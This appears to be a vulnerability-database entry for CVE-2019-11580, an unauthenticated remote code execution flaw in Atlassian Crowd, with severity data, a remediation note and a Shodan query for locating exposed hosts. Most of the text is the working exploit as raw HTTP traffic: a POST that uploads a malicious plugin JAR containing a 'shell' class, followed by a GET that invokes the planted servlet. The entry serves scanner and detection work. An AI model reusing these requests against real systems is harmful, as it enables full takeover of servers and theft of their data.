| Title | Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution |
|---|---|
| Author | dwisiswant0 |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system. |
| Remediation | Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94386 |
| CVE ID | CVE-2019-11580 |
| Shodan Query | http.component:"Atlassian Jira"http.component:"atlassian jira" |
| Tags | cve cve2019 packetstorm kev atlassian rce intrusive unauth vkev vuln |
Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
POST /crowd/admin/uploadplugin.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15
Connection: close
Content-Length: 1960
Accept-Encoding: gzip, deflate
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
Expect: 100-continue
------------------------------f15fe87e95a7
Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
Content-Type: application/octet-stream
PK ?%WTL%'� atlassian-plugin.xmlUT ��d��dux � � }�An� E��){ �#� 9�OS}&'�U��|f�����1�����w�m��̟�į�� #�����3�b��eqǔ]=?rf�]٘���p�#V���`l��\C�$�p��.�)iF�~fVf��T��laG2i�Z���-�9Ƚ�k���Z���u:c�{,
����
�O���y���:'/(�F���Z�=k���cbPX#ʪ�(ڰ���咐���7�PK
?%W com/UT ��d���dux � � PK
?%W com/cdl/UT ��d���dux � � PK
�B%W com/cdl/shell/UT ���d���dux � � PK �B%W��Lag F com/cdl/shell/exp.classUT &��d���dux � � �Q�NA}%� �"⾠^��Ĩ�x!�$D
<#tp�8�3
�[^4z��(c��pR;�Z^��~����`�Q���a�&��Ĕ�i3���Xj�Hgj�`�mJB�l9�ss)�����H��JE�����n�'|�um�ĕRmqĦ�*�#}U���]Ǘ�5Z�5d[Y���v��<�t��7�e&D̙��a�X+e7s��l>���3�h"�%B��ވF����m������� ,W�~CX��#�-�.<KI�0�Δ�n;�,��0�d fi�t@��K+��UŔ������i �s�Ȟ؇�A��nl���1�\��i������*�|
��8�(��(��G˱wPK :B%WH>yڿ com/cdl/shell/exp.javaUT 0��d0��dux � � U�Ak�0�����d,�)6ra���A{��xsc�R�������=��=���G�Oh�ܒs�R�|�ֽ�)��[��O��D�q��GCA��._�0N3�!�P�0�����JA�#�{�@�?H�YhG��@��3��s�S28i�f?�rx(%�Hr�V(f9�%[���b�,ߊ�|y].��LjRWPK ?%WTL%'� �� atlassian-plugin.xmlUT ��dux � � PK
?%W �A9 com/UT ��dux � � PK
?%W �Aw com/cdl/UT ��dux � � PK
�B%W �A� com/cdl/shell/UT ���dux � � PK �B%W��Lag F �� com/cdl/shell/exp.classUT &��dux � � PK :B%WH>yڿ ��� com/cdl/shell/exp.javaUT 0��dux � � PK � �
------------------------------f15fe87e95a7--
GET /crowd/plugins/servlet/exp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-11580.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-11580.pcap
N/AN/A